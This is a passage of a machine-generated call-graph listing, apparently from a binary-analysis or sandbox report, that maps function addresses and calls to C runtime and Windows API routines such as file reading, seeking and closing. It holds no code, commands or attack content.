calls 85048->85741 85053->84835 85056 401a30 85055->85056 85057 401a17 85055->85057 85059 402160 52 API calls 85056->85059 85058 401a2d 85057->85058 85745 403c30 52 API calls _memmove 85057->85745 85058->84839 85061 401a3d 85059->85061 85061->84839 85063 411523 85062->85063 85064 4114ba 85062->85064 85748 4113a8 58 API calls 3 library calls 85063->85748 85069 40200c 85064->85069 85746 417f77 46 API calls __getptd_noexit 85064->85746 85067 4114c6 85747 417f25 10 API calls _fseek 85067->85747 85069->84842 85069->84843 85070->84871 85071->84874 85072->84878 85073->84878 85075 4026f0 52 API calls 85074->85075 85076 401c97 85075->85076 85076->85003 85077->85013 85078->85012 85139 40f6f0 85079->85139 85081 40f77b _strcat moneypunct 85147 40f850 85081->85147 85086 427c2a 85176 414d04 85086->85176 85088 40f7fc 85088->85086 85089 40f804 85088->85089 85163 414a46 85089->85163 85094 40f80e 85094->85017 85098 4528bd 85094->85098 85095 427c59 85182 414fe2 85095->85182 85097 427c79 85099 4150d1 _fseek 81 API calls 85098->85099 85100 452930 85099->85100 85679 452719 85100->85679 85103 452948 85103->85019 85104 414d04 __fread_nolock 61 API calls 85105 452966 85104->85105 85106 414d04 __fread_nolock 61 API calls 85105->85106 85107 452976 85106->85107 85108 414d04 __fread_nolock 61 API calls 85107->85108 85109 45298f 85108->85109 85110 414d04 __fread_nolock 61 API calls 85109->85110 85111 4529aa 85110->85111 85112 4150d1 _fseek 81 API calls 85111->85112 85113 4529c4 85112->85113 85114 4135bb _malloc 46 API calls 85113->85114 85115 4529cf 85114->85115 85116 4135bb _malloc 46 API calls 85115->85116 85117 4529db 85116->85117 85118 414d04 __fread_nolock 61 API calls 85117->85118 85119 4529ec 85118->85119 85120 44afef GetSystemTimeAsFileTime 85119->85120 85121 452a00 85120->85121 85122 452a36 85121->85122 85123 452a13 85121->85123 85124 452aa5 85122->85124 85125 452a3c 85122->85125 85126 413748 _free 46 API calls 85123->85126 85129 413748 _free 46 API calls 85124->85129 85685 44b1a9 85125->85685 85127 452a1c 85126->85127 85130 413748 _free 46 API calls 85127->85130 85132 452aa3 85129->85132 85133 452a25 85130->85133 85131 452a9d 85134 413748 _free 46 API calls 85131->85134 85132->85019 85133->85019 85134->85132 85136 431e64 85135->85136 85137 431e6a 85135->85137 85138 414a46 __fcloseall 82 API calls 85136->85138 85137->85020 85138->85137 85140 425de2 85139->85140 85141 40f6fc _wcslen 85139->85141 85140->85081 85142 40f710 WideCharToMultiByte 85141->85142 85143 40f756 85142->85143 85144 40f728 85142->85144 85143->85081 85145 4115d7 52 API calls 85144->85145 85146 40f735 WideCharToMultiByte 85145->85146 85146->85081 85149 40f85d setSBUpLow _strlen 85147->85149 85150 40f7ab 85149->85150 85195 414db8 85149->85195 85151 4149c2 85150->85151 85207 414904 85151->85207 85153 40f7e9 85153->85086 85154 40f5c0 85153->85154 85158 40f5cd _strcat __write_nolock _memmove 85154->85158 85155 414d04 __fread_nolock 61 API calls 85155->85158 85156 40f691 __tzset_nolock 85156->85088 85158->85155 85158->85156 85162 425d11 85158->85162 85295 4150d1 85158->85295 85159 4150d1 _fseek 81 API calls 85160 425d33 85159->85160 85161 414d04 __fread_nolock 61 API calls 85160->85161 85161->85156 85162->85159 85164 414a52 _fseek 85163->85164 85165 414a64 85164->85165 85166 414a79 85164->85166 85435 417f77 46 API calls __getptd_noexit 85165->85435 85169 415471 __lock_file 47 API calls 85166->85169 85173 414a74 _fseek 85166->85173 85168 414a69 85436 417f25 10 API calls _fseek 85168->85436 85171 414a92 85169->85171 85419 4149d9 85171->85419 85173->85094 85504 414c76 85176->85504 85178 414d1c 85179 44afef 85178->85179 85672 442c5a 85179->85672 85181 44b00d 85181->85095 85183 414fee _fseek 85182->85183 85184 414ffa 85183->85184 85185 41500f 85183->85185 85676 417f77 46 API calls __getptd_noexit 85184->85676 85187 415471 __lock_file 47 API calls 85185->85187 85189 415017 85187->85189 85188 414fff 85677 417f25 10 API calls _fseek 85188->85677 85191 414e4e __ftell_nolock 51 API calls 85189->85191 85192 415024 85191->85192 85678 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 85192->85678 85194 41500a _fseek 85194->85097 85196 414dd6 85195->85196 85197 414deb 85195->85197 85204 417f77 46 API calls __getptd_noexit 85196->85204 85197->85196 85202 414df2 85197->85202 85199 414ddb 85205 417f25 10 API calls _fseek 85199->85205 85201 414de6 85201->85149 85202->85201 85206 418f98 77 API calls 6 library calls 85202->85206 85204->85199 85205->85201 85206->85201 85210 414910 _fseek 85207->85210 85208 414923 85263 417f77 46 API calls __getptd_noexit 85208->85263 85210->85208 85212 414951 85210->85212 85211 414928 85264 417f25 10 API calls _fseek 85211->85264 85226 41d4d1 85212->85226 85215 414956 85216 41496a 85215->85216 85217 41495d 85215->85217 85219 414992 85216->85219 85220 414972 85216->85220 85265 417f77 46 API calls __getptd_noexit 85217->85265 85243 41d218 85219->85243 85266 417f77 46 API calls __getptd_noexit 85220->85266 85221 414933 _fseek @_EH4_CallFilterFunc@8 85221->85153 85227 41d4dd _fseek 85226->85227 85228 4182cb __lock 46 API calls 85227->85228 85240 41d4eb 85228->85240 85229 41d560 85268 41d5fb 85229->85268 85230 41d567 85232 416b04 __malloc_crt 46 API calls 85230->85232 85234 41d56e 85232->85234 85233 41d5f0 _fseek 85233->85215 85234->85229 85235 41d57c InitializeCriticalSectionAndSpinCount 85234->85235 85237 41d59c 85235->85237 85238 41d5af EnterCriticalSection 85235->85238 85241 413748 _free 46 API calls 85237->85241 85238->85229 85239 418209 __mtinitlocknum 46 API calls 85239->85240 85240->85229 85240->85230 85240->85239 85271 4154b2 47 API calls __lock 85240->85271 85272 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85240->85272 85241->85229 85244 41d23a 85243->85244 85245 41d255 85244->85245 85254 41d26c __wopenfile 85244->85254 85277 417f77 46 API calls __getptd_noexit 85245->85277 85247 41d25a 85278 417f25 10 API calls _fseek 85247->85278 85249 41d47a 85282 417f77 46 API calls __getptd_noexit 85249->85282 85250 41d48c 85274 422bf9 85250->85274 85253 41499d 85267 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 85253->85267 85254->85249 85262 41d421 85254->85262 85279 41341f 58 API calls 2 library calls 85254->85279 85255 41d47f 85283 417f25 10 API calls _fseek 85255->85283 85258 41d41a 85258->85262 85280 41341f 58 API calls 2 library calls 85258->85280 85260 41d439 85260->85262 85281 41341f 58 API calls 2 library calls 85260->85281 85262->85249 85262->85250 85263->85211 85264->85221 85265->85221 85266->85221 85267->85221 85273 4181f2 LeaveCriticalSection 85268->85273 85270 41d602 85270->85233 85271->85240 85272->85240 85273->85270 85284 422b35 85274->85284 85276 422c14 85276->85253 85277->85247 85278->85253 85279->85258 85280->85260 85281->85262 85282->85255 85283->85253 85285 422b41 _fseek 85284->85285 85286 422b54 85285->85286 85288 422b8a 85285->85288 85287 417f77 _fseek 46 API calls 85286->85287 85289 422b59 85287->85289 85290 422400 __tsopen_nolock 109 API calls 85288->85290 85291 417f25 _fseek 10 API calls 85289->85291 85292 422ba4 85290->85292 85294 422b63 _fseek 85291->85294 85293 422bcb __wsopen_helper LeaveCriticalSection 85292->85293 85293->85294 85294->85276 85298 4150dd _fseek 85295->85298 85296 4150e9 85326 417f77 46 API calls __getptd_noexit 85296->85326 85298->85296 85299 41510f 85298->85299 85308 415471 85299->85308 85300 4150ee 85327 417f25 10 API calls _fseek 85300->85327 85307 4150f9 _fseek 85307->85158 85309 415483 85308->85309 85310 4154a5 EnterCriticalSection 85308->85310 85309->85310 85311 41548b 85309->85311 85312 415117 85310->85312 85313 4182cb __lock 46 API calls 85311->85313 85314 415047 85312->85314 85313->85312 85315 415067 85314->85315 85316 415057 85314->85316 85318 415079 85315->85318 85329 414e4e 85315->85329 85384 417f77 46 API calls __getptd_noexit 85316->85384 85346 41443c 85318->85346 85323 4150b9 85359 41e1f4 85323->85359 85325 41505c 85328 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 85325->85328 85326->85300 85327->85307 85328->85307 85330 414e61 85329->85330 85331 414e79 85329->85331 85385 417f77 46 API calls __getptd_noexit 85330->85385 85332 414139 __fputwc_nolock 46 API calls 85331->85332 85334 414e80 85332->85334 85337 41e1f4 __write 51 API calls 85334->85337 85335 414e66 85386 417f25 10 API calls _fseek 85335->85386 85338 414e97 85337->85338 85339 414f09 85338->85339 85341 414ec9 85338->85341 85345 414e71 85338->85345 85387 417f77 46 API calls __getptd_noexit 85339->85387 85342 41e1f4 __write 51 API calls 85341->85342 85341->85345 85343 414f64 85342->85343 85344 41e1f4 __write 51 API calls 85343->85344 85343->85345 85344->85345 85345->85318 85347 414455 85346->85347 85351 414477 85346->85351 85348 414139 __fputwc_nolock 46 API calls 85347->85348 85347->85351 85349 414470 85348->85349 85388 41b7b2 77 API calls 5 library calls 85349->85388 85352 414139 85351->85352 85353 414145 85352->85353 85354 41415a 85352->85354 85389 417f77 46 API calls __getptd_noexit 85353->85389 85354->85323 85356 41414a 85390 417f25 10 API calls _fseek 85356->85390 85358 414155 85358->85323 85360 41e200 _fseek 85359->85360 85361 41e223 85360->85361 85362 41e208 85360->85362 85364 41e22f 85361->85364 85368 41e269 85361->85368 85411 417f8a 46 API calls __getptd_noexit 85362->85411 85413 417f8a 46 API calls __getptd_noexit 85364->85413 85366 41e20d 85412 417f77 46 API calls __getptd_noexit 85366->85412 85367 41e234 85414 417f77 46 API calls __getptd_noexit 85367->85414 85391 41ae56 85368->85391 85372 41e23c 85415 417f25 10 API calls _fseek 85372->85415 85373 41e26f 85375 41e291 85373->85375 85376 41e27d 85373->85376 85416 417f77 46 API calls __getptd_noexit 85375->85416 85401 41e17f 85376->85401 85377 41e215 _fseek 85377->85325 85380 41e289 85418 41e2c0 LeaveCriticalSection __unlock_fhandle 85380->85418 85381 41e296 85417 417f8a 46 API calls __getptd_noexit 85381->85417 85384->85325 85385->85335 85386->85345 85387->85345 85388->85351 85389->85356 85390->85358 85392 41ae62 _fseek 85391->85392 85393 41aebc 85392->85393 85394 4182cb __lock 46 API calls 85392->85394 85395 41aec1 EnterCriticalSection 85393->85395 85396 41aede _fseek 85393->85396 85397 41ae8e 85394->85397 85395->85396 85396->85373 85398 41aeaa 85397->85398 85399 41ae97 InitializeCriticalSectionAndSpinCount 85397->85399 85400 41aeec ___lock_fhandle LeaveCriticalSection 85398->85400 85399->85398 85400->85393 85402 41aded __commit 46 API calls 85401->85402 85403 41e18e 85402->85403 85404 41e1a4 SetFilePointer 85403->85404 85405 41e194 85403->85405 85406 41e1bb GetLastError 85404->85406 85408 41e1c3 85404->85408 85407 417f77 _fseek 46 API calls 85405->85407 85406->85408 85409 41e199 85407->85409 85408->85409 85410 417f9d __dosmaperr 46 API calls 85408->85410 85409->85380 85410->85409 85411->85366 85412->85377 85413->85367 85414->85372 85415->85377 85416->85381 85417->85380 85418->85377 85420 4149ea 85419->85420 85421 4149fe 85419->85421 85465 417f77 46 API calls __getptd_noexit 85420->85465 85422 4149fa 85421->85422 85424 41443c __flush 77 API calls 85421->85424 85437 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 85422->85437 85426 414a0a 85424->85426 85425 4149ef 85466 417f25 10 API calls _fseek 85425->85466 85438 41d8c2 85426->85438 85430 414139 __fputwc_nolock 46 API calls 85431 414a18 85430->85431 85442 41d7fe 85431->85442 85433 414a1e 85433->85422 85434 413748 _free 46 API calls 85433->85434 85434->85422 85435->85168 85436->85173 85437->85173 85439 414a12 85438->85439 85440 41d8d2 85438->85440 85439->85430 85440->85439 85441 413748 _free 46 API calls 85440->85441 85441->85439 85443 41d80a _fseek 85442->85443 85444 41d812 85443->85444 85445 41d82d 85443->85445 85482 417f8a 46 API calls __getptd_noexit 85444->85482 85446 41d839 85445->85446 85452 41d873 85445->85452 85484 417f8a 46 API calls __getptd_noexit 85446->85484 85448 41d817 85483 417f77 46 API calls __getptd_noexit 85448->85483 85451 41d83e 85485 417f77 46 API calls __getptd_noexit 85451->85485 85454 41ae56 ___lock_fhandle 48 API calls 85452->85454 85455 41d879 85454->85455 85457 41d893 85455->85457 85458 41d887 85455->85458 85456 41d846 85486 417f25 10 API calls _fseek 85456->85486 85487 417f77 46 API calls __getptd_noexit 85457->85487 85467 41d762 85458->85467 85462 41d81f _fseek 85462->85433 85463 41d88d 85488 41d8ba LeaveCriticalSection __unlock_fhandle 85463->85488 85465->85425 85466->85422 85489 41aded 85467->85489 85469 41d7c8 85502 41ad67 47 API calls 2 library calls 85469->85502 85470 41d772 85470->85469 85471 41d7a6 85470->85471 85473 41aded __commit 46 API calls 85470->85473 85471->85469 85474 41aded __commit 46 API calls 85471->85474 85476 41d79d 85473->85476 85477 41d7b2 CloseHandle 85474->85477 85475 41d7d0 85478 41d7f2 85475->85478 85503 417f9d 46 API calls 3 library calls 85475->85503 85480 41aded __commit 46 API calls 85476->85480 85477->85469 85481 41d7be GetLastError 85477->85481 85478->85463 85480->85471 85481->85469 85482->85448 85483->85462 85484->85451 85485->85456 85486->85462 85487->85463 85488->85462 85490 41adfa 85489->85490 85491 41ae12 85489->85491 85492 417f8a __read 46 API calls 85490->85492 85493 417f8a __read 46 API calls 85491->85493 85497 41ae51 85491->85497 85494 41adff 85492->85494 85496 41ae23 85493->85496 85495 417f77 _fseek 46 API calls 85494->85495 85498 41ae07 85495->85498 85499 417f77 _fseek 46 API calls 85496->85499 85497->85470 85498->85470 85500 41ae2b 85499->85500 85501 417f25 _fseek 10 API calls 85500->85501 85501->85498 85502->85475 85503->85478 85505 414c82 _fseek 85504->85505 85506 414cc3 85505->85506 85507 414c96 setSBUpLow 85505->85507 85508 414cbb _fseek 85505->85508 85509 415471 __lock_file 47 API calls 85506->85509 85531 417f77 46 API calls __getptd_noexit 85507->85531 85508->85178 85511 414ccb 85509->85511 85517 414aba 85511->85517 85512 414cb0 85532 417f25 10 API calls _fseek 85512->85532 85518 414af2 85517->85518 85522 414ad8 setSBUpLow 85517->85522 85533 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 85518->85533 85519 414ae2 85584 417f77 46 API calls __getptd_noexit 85519->85584 85521 414ae7 85585 417f25 10 API calls _fseek 85521->85585 85522->85518 85522->85519 85528 414b2d 85522->85528 85525 414c38 setSBUpLow 85587 417f77 46 API calls __getptd_noexit 85525->85587 85526 414139 __fputwc_nolock 46 API calls 85526->85528 85528->85518 85528->85525 85528->85526 85534 41dfcc 85528->85534 85564 41d8f3 85528->85564 85586 41e0c2 46 API calls 3 library calls 85528->85586 85531->85512 85532->85508 85533->85508 85535 41dfd8 _fseek 85534->85535 85536 41dfe0 85535->85536 85537 41dffb 85535->85537 85657 417f8a 46 API calls __getptd_noexit 85536->85657 85539 41e007 85537->85539 85542 41e041 85537->85542 85659 417f8a 46 API calls __getptd_noexit 85539->85659 85540 41dfe5 85658 417f77 46 API calls __getptd_noexit 85540->85658 85546 41e063 85542->85546 85547 41e04e 85542->85547 85544 41e00c 85660 417f77 46 API calls __getptd_noexit 85544->85660 85550 41ae56 ___lock_fhandle 48 API calls 85546->85550 85662 417f8a 46 API calls __getptd_noexit 85547->85662 85548 41dfed _fseek 85548->85528 85552 41e069 85550->85552 85551 41e053 85663 417f77 46 API calls __getptd_noexit 85551->85663 85555 41e077 85552->85555 85556 41e08b 85552->85556 85588 41da15 85555->85588 85664 417f77 46 API calls __getptd_noexit 85556->85664 85559 41e014 85661 417f25 10 API calls _fseek 85559->85661 85560 41e083 85666 41e0ba LeaveCriticalSection __unlock_fhandle 85560->85666 85561 41e090 85665 417f8a 46 API calls __getptd_noexit 85561->85665 85565 41d900 85564->85565 85570 41d915 85564->85570 85670 417f77 46 API calls __getptd_noexit 85565->85670 85566 41d910 85566->85528 85568 41d905 85671 417f25 10 API calls _fseek 85568->85671 85570->85566 85571 41d94a 85570->85571 85667 420603 85570->85667 85573 414139 __fputwc_nolock 46 API calls 85571->85573 85574 41d95e 85573->85574 85575 41dfcc __read 59 API calls 85574->85575 85576 41d965 85575->85576 85576->85566 85577 414139 __fputwc_nolock 46 API calls 85576->85577 85578 41d988 85577->85578 85578->85566 85579 414139 __fputwc_nolock 46 API calls 85578->85579 85580 41d994 85579->85580 85580->85566 85581 414139 __fputwc_nolock 46 API calls 85580->85581 85582 41d9a1 85581->85582 85583 414139 __fputwc_nolock 46 API calls 85582->85583 85583->85566 85584->85521 85585->85518 85586->85528 85587->85521 85589 41da31 85588->85589 85590 41da4c 85588->85590 85592 417f8a __read 46 API calls 85589->85592 85591 41da5b 85590->85591 85594 41da7a 85590->85594 85595 417f8a __read 46 API calls 85591->85595 85593 41da36 85592->85593 85596 417f77 _fseek 46 API calls 85593->85596 85598 41da98 85594->85598 85610 41daac 85594->85610 85597 41da60 85595->85597 85599 41da3e 85596->85599 85601 417f77 _fseek 46 API calls 85597->85601 85602 417f8a __read 46 API calls 85598->85602 85599->85560 85600 41db02 85604 417f8a __read 46 API calls 85600->85604 85603 41da67 85601->85603 85605 41da9d 85602->85605 85607 417f25 _fseek 10 API calls 85603->85607 85608 41db07 85604->85608 85606 417f77 _fseek 46 API calls 85605->85606 85609 41daa4 85606->85609 85607->85599 85611 417f77 _fseek 46 API calls 85608->85611 85613 417f25 _fseek 10 API calls 85609->85613 85610->85599 85610->85600 85612 41dae1 85610->85612 85615 41db1b 85610->85615 85611->85609 85612->85600 85614 41daec ReadFile 85612->85614 85613->85599 85619 41dc17 85614->85619 85620 41df8f GetLastError 85614->85620 85617 416b04 __malloc_crt 46 API calls 85615->85617 85618 41db31 85617->85618 85623 41db59 85618->85623 85624 41db3b 85618->85624 85619->85620 85628 41dc2b 85619->85628 85621 41de16 85620->85621 85622 41df9c 85620->85622 85632 417f9d __dosmaperr 46 API calls 85621->85632 85636 41dd9b 85621->85636 85626 417f77 _fseek 46 API calls 85622->85626 85625 420494 __lseeki64_nolock 48 API calls 85623->85625 85627 417f77 _fseek 46 API calls 85624->85627 85629 41db67 85625->85629 85630 41dfa1 85626->85630 85631 41db40 85627->85631 85628->85636 85642 41de5b 85628->85642 85644 41dc47 85628->85644 85629->85614 85633 417f8a __read 46 API calls 85630->85633 85634 417f8a __read 46 API calls 85631->85634 85632->85636 85633->85636 85634->85599 85635 413748 _free 46 API calls 85635->85599 85636->85599 85636->85635 85637 41dcab ReadFile 85641 41dcc9 GetLastError 85637->85641 85648 41dcd3 85637->85648 85638 41ded0 ReadFile 85639 41deef GetLastError 85638->85639 85649 41def9 85638->85649 85639->85642 85639->85649 85640 41ddec MultiByteToWideChar 85640->85636 85643 41de10 GetLastError 85640->85643 85641->85644 85641->85648 85642->85636 85642->85638 85643->85621 85644->85637 85645 41dd28 85644->85645 85645->85636 85646 41dda3 85645->85646 85647 41dd96 85645->85647 85651 41dd60 85645->85651 85646->85651 85652 41ddda 85646->85652 85650 417f77 _fseek 46 API calls 85647->85650 85648->85644 85653 420494 __lseeki64_nolock 48 API calls 85648->85653 85649->85642 85654 420494 __lseeki64_nolock 48 API calls 85649->85654 85650->85636 85651->85640 85655 420494 __lseeki64_nolock 48 API calls 85652->85655 85653->85648 85654->85649 85656 41dde9 85655->85656 85656->85640 85657->85540 85658->85548 85659->85544 85660->85559 85661->85548 85662->85551 85663->85559 85664->85561 85665->85560 85666->85548 85668 416b04 __malloc_crt 46 API calls 85667->85668 85669 420618 85668->85669 85669->85571 85670->85568 85671->85566 85675 4148b3 GetSystemTimeAsFileTime __aulldiv 85672->85675 85674 442c6b 85674->85181 85675->85674 85676->85188 85677->85194 85678->85194 85684 45272f __tzset_nolock _wcscpy 85679->85684 85680 414d04 61 API calls __fread_nolock 85680->85684 85681 44afef GetSystemTimeAsFileTime 85681->85684 85682 4528a4 85682->85103 85682->85104 85683 4150d1 81 API calls _fseek 85683->85684 85684->85680 85684->85681 85684->85682 85684->85683 85686 44b1bc 85685->85686 85687 44b1ca 85685->85687 85688 4149c2 116 API calls 85686->85688 85689 44b1e1 85687->85689 85690 4149c2 116 API calls 85687->85690 85691 44b1d8 85687->85691 85688->85687 85720 4321a4 85689->85720 85692 44b2db 85690->85692 85691->85131 85692->85689 85694 44b2e9 85692->85694 85697 414a46 __fcloseall 82 API calls 85694->85697 85702 44b2f6 85694->85702 85695 44b224 85696 44b253 85695->85696 85699 44b228 85695->85699 85724 43213d 85696->85724 85697->85702 85700 44b235 85699->85700 85704 414a46 __fcloseall 82 API calls 85699->85704 85701 44b245 85700->85701 85705 414a46 __fcloseall 82 API calls 85700->85705 85701->85131 85702->85131 85703 44b25a 85706 44b260 85703->85706 85707 44b289 85703->85707 85704->85700 85705->85701 85709 44b26d 85706->85709 85711 414a46 __fcloseall 82 API calls 85706->85711 85734 44b0bf 87 API calls 85707->85734 85712 44b27d 85709->85712 85714 414a46 __fcloseall 82 API calls 85709->85714 85710 44b28f 85735 4320f8 46 API calls _free 85710->85735 85711->85709 85712->85131 85714->85712 85715 44b295 85716 44b2a2 85715->85716 85717 414a46 __fcloseall 82 API calls 85715->85717 85718 44b2b2 85716->85718 85719 414a46 __fcloseall 82 API calls 85716->85719 85717->85716 85718->85131 85719->85718 85721 4321cb 85720->85721 85723 4321b4 __tzset_nolock _memmove 85720->85723 85722 414d04 __fread_nolock 61 API calls 85721->85722 85722->85723 85723->85695 85725 4135bb _malloc 46 API calls 85724->85725 85726 432150 85725->85726 85727 4135bb _malloc 46 API calls 85726->85727 85728 432162 85727->85728 85729 4135bb _malloc 46 API calls 85728->85729 85731 432174 85729->85731 85733 432189 85731->85733 85736 4320f8 46 API calls _free 85731->85736 85732 432198 85732->85703 85733->85703 85734->85710 85735->85715 85736->85732 85737->85033 85738->85036 85739->85053 85740->85053 85741->85053 85742->85045 85743->85053 85744->85053 85745->85058 85746->85067 85747->85069 85748->85069 85798 410160 85749->85798 85751 41012f GetFullPathNameW 85752 410147 moneypunct 85751->85752 85752->84888 85754 4102cb SHGetDesktopFolder 85753->85754 85757 410333 _wcsncpy 85753->85757 85755 4102e0 _wcsncpy 85754->85755 85754->85757 85756 41031c SHGetPathFromIDListW 85755->85756 85755->85757 85756->85757 85757->84891 85759 425f4a 85758->85759 85760 4101bb 85758->85760 85763 4114ab __wcsicoll 58 API calls 85759->85763 85766 425f6e 85759->85766 85761 410160 52 API calls 85760->85761 85762 4101c7 85761->85762 85802 410200 52 API calls 2 library calls 85762->85802 85763->85759 85765 4101d6 85803 410200 52 API calls 2 library calls 85765->85803 85766->84893 85768 4101e9 85768->84893 85770 40f760 126 API calls 85769->85770 85771 40f584 85770->85771 85772 429335 85771->85772 85773 40f58c 85771->85773 85776 4528bd 118 API calls 85772->85776 85774 40f598 85773->85774 85775 429358 85773->85775 85828 4033c0 113 API calls 7 library calls 85774->85828 85829 434034 86 API calls _wprintf 85775->85829 85778 42934b 85776->85778 85782 429373 85778->85782 85783 42934f 85778->85783 85780 429369 85780->85782 85781 40f5b4 85781->84889 85784 4115d7 52 API calls 85782->85784 85785 431e58 82 API calls 85783->85785 85794 4293c5 moneypunct 85784->85794 85785->85775 85786 42959c 85787 413748 _free 46 API calls 85786->85787 85788 4295a5 85787->85788 85789 431e58 82 API calls 85788->85789 85790 4295b1 85789->85790 85794->85786 85795 401b10 52 API calls 85794->85795 85804 444af8 85794->85804 85807 44b41c 85794->85807 85814 402780 85794->85814 85822 4022d0 85794->85822 85830 44c7dd 64 API calls 3 library calls 85794->85830 85795->85794 85799 410167 _wcslen 85798->85799 85800 4115d7 52 API calls 85799->85800 85801 41017e _wcscpy 85800->85801 85801->85751 85802->85765 85803->85768 85805 4115d7 52 API calls 85804->85805 85806 444b27 _memmove 85805->85806 85806->85794 85808 44b429 85807->85808 85809 4115d7 52 API calls 85808->85809 85810 44b440 85809->85810 85811 44b45e 85810->85811 85812 401b10 52 API calls 85810->85812 85811->85794 85813 44b453 85812->85813 85813->85794 85815 402827 85814->85815 85818 402790 moneypunct _memmove 85814->85818 85817 4115d7 52 API calls 85815->85817 85816 4115d7 52 API calls 85819 402797 85816->85819 85817->85818 85818->85816 85820 4027bd 85819->85820 85821 4115d7 52 API calls 85819->85821 85820->85794 85821->85820 85823 4022e0 85822->85823 85825 40239d 85822->85825 85824 4115d7 52 API calls 85823->85824 85823->85825 85826 402320 moneypunct 85823->85826 85824->85826 85825->85794 85826->85825 85827 4115d7 52 API calls 85826->85827 85827->85826 85828->85781 85829->85780 85830->85794 85832 402417 85831->85832 85836 402539 moneypunct 85831->85836 85833 4115d7 52 API calls 85832->85833 85832->85836 85834 402443 85833->85834 85835 4115d7 52 API calls 85834->85835 85837 4024b4 85835->85837 85836->84897 85837->85836 85839 4022d0 52 API calls 85837->85839 85860 402880 85837->85860 85839->85837 85844 401566 85840->85844 85841 401794 85912 40e9a0 90 API calls 85841->85912 85843 40167a 85847 4017c0 85843->85847 85913 45e737 90 API calls 3 library calls 85843->85913 85844->85841 85844->85843 85846 4010a0 52 API calls 85844->85846 85846->85844 85847->84899 85849 40bc70 52 API calls 85848->85849 85858 40d451 85849->85858 85850 40d50f 85916 410600 52 API calls 85850->85916 85852 427c01 85917 45e737 90 API calls 3 library calls 85852->85917 85853 40e0a0 52 API calls 85853->85858 85855 401b10 52 API calls 85855->85858 85856 40d519 85856->84902 85858->85850 85858->85852 85858->85853 85858->85855 85858->85856 85914 40f310 53 API calls 85858->85914 85915 40d860 91 API calls 85858->85915 85861 4115d7 52 API calls 85860->85861 85862 4028b3 85861->85862 85863 4115d7 52 API calls 85862->85863 85884 4028c5 moneypunct _memmove 85863->85884 85864 402780 52 API calls 85865 402b1e moneypunct 85864->85865 85865->85837 85866 427d62 85869 403350 52 API calls 85866->85869 85868 402bb6 85903 403060 53 API calls 85868->85903 85883 427d6b 85869->85883 85871 402aeb moneypunct 85871->85864 85874 42802b moneypunct 85871->85874 85872 402bca 85875 427f63 85872->85875 85876 402bd4 85872->85876 85873 402780 52 API calls 85873->85884 85909 460879 92 API calls 3 library calls 85875->85909 85879 402780 52 API calls 85876->85879 85877 403350 52 API calls 85877->85884 85882 402bdf 85879->85882 85880 427f48 85880->85865 85882->85837 85901 427f2c 85883->85901 85906 403020 52 API calls _memmove 85883->85906 85884->85866 85884->85868 85884->85871 85884->85873 85884->85877 85885 427fd5 85884->85885 85890 427fa5 85884->85890 85891 402f00 52 API calls 85884->85891 85893 428000 85884->85893 85895 4026f0 52 API calls 85884->85895 85900 4115d7 52 API calls 85884->85900 85884->85901 85902 4031b0 63 API calls 85884->85902 85904 402f80 92 API calls _memmove 85884->85904 85905 402280 52 API calls 85884->85905 85907 4013a0 52 API calls 85884->85907 85910 460879 92 API calls 3 library calls 85885->85910 85889 427fe4 85898 402780 52 API calls 85889->85898 85899 402780 52 API calls 85890->85899 85891->85884 85911 460879 92 API calls 3 library calls 85893->85911 85897 402a85 CharUpperBuffW 85895->85897 85897->85884 85898->85880 85899->85865 85900->85884 85908 460879 92 API calls 3 library calls 85901->85908 85902->85884 85903->85872 85904->85884 85905->85884 85906->85883 85907->85884 85908->85880 85909->85880 85910->85889 85911->85865 85912->85843 85913->85847 85914->85858 85915->85858 85916->85856 85917->85856 85918->84915 85919->84916 85921 42c5fe 85920->85921 85936 4091c6 85920->85936 85922 40bc70 52 API calls 85921->85922 85921->85936 85923 42c64e InterlockedIncrement 85922->85923 85924 42c665 85923->85924 85929 42c697 85923->85929 85926 42c672 InterlockedDecrement Sleep InterlockedIncrement 85924->85926 85924->85929 85925 42c737 InterlockedDecrement 85927 42c74a 85925->85927 85926->85924 85926->85929 85930 408f40 VariantClear 85927->85930 85928 42c731 85928->85925 85929->85925 85929->85928 86078 408e80 85929->86078 85932 42c752 85930->85932 86091 410c60 VariantClear moneypunct 85932->86091 85936->84978 85937 42c6db 85938 402160 52 API calls 85937->85938 85939 42c6e5 85938->85939 85940 45340c 85 API calls 85939->85940 85941 42c6f1 85940->85941 86088 40d200 52 API calls 2 library calls 85941->86088 85943 42c6fb 86089 465124 53 API calls 85943->86089 85945 42c715 85946 42c76a 85945->85946 85947 42c719 85945->85947 85949 401b10 52 API calls 85946->85949 86090 46fe32 VariantClear 85947->86090 85950 42c77e 85949->85950 85951 401980 53 API calls 85950->85951 85956 42c796 85951->85956 85952 42c812 86093 46fe32 VariantClear 85952->86093 85954 42c82a InterlockedDecrement 86094 46ff07 54 API calls 85954->86094 85956->85952 85957 42c864 85956->85957 86092 40ba10 52 API calls 2 library calls 85956->86092 86095 45e737 90 API calls 3 library calls 85957->86095 85959 42c9ec 86138 47d33e 338 API calls 85959->86138 85962 42c9fe 86139 46feb1 VariantClear VariantClear 85962->86139 85964 42c874 85967 408f40 VariantClear 85964->85967 85977 42ca59 85964->85977 85965 408f40 VariantClear 85974 42c849 85965->85974 85966 42ca08 85968 401b10 52 API calls 85966->85968 85969 42c891 85967->85969 85970 42ca15 85968->85970 86096 410c60 VariantClear moneypunct 85969->86096 85971 40c2c0 52 API calls 85970->85971 85971->85964 85973 401980 53 API calls 85973->85974 85974->85959 85974->85965 85974->85973 85975 402780 52 API calls 85974->85975 86097 40a780 85974->86097 85975->85974 85977->85977 85979 40afc4 85978->85979 85980 40b156 85978->85980 85981 40afd5 85979->85981 85982 42d1e3 85979->85982 86150 45e737 90 API calls 3 library calls 85980->86150 85985 40a780 201 API calls 85981->85985 86003 40b11a moneypunct 85981->86003 86151 45e737 90 API calls 3 library calls 85982->86151 85988 40b00a 85985->85988 85986 40b143 85986->84978 85987 42d1f8 85991 408f40 VariantClear 85987->85991 85988->85987 85992 40b012 85988->85992 85990 42d4db 85990->85990 85991->85986 85993 40b04a 85992->85993 85995 42d231 VariantClear 85992->85995 85996 40b094 moneypunct 85992->85996 86001 40b05c moneypunct 85993->86001 86152 40e270 VariantClear moneypunct 85993->86152 85994 40b108 85994->86003 86153 40e270 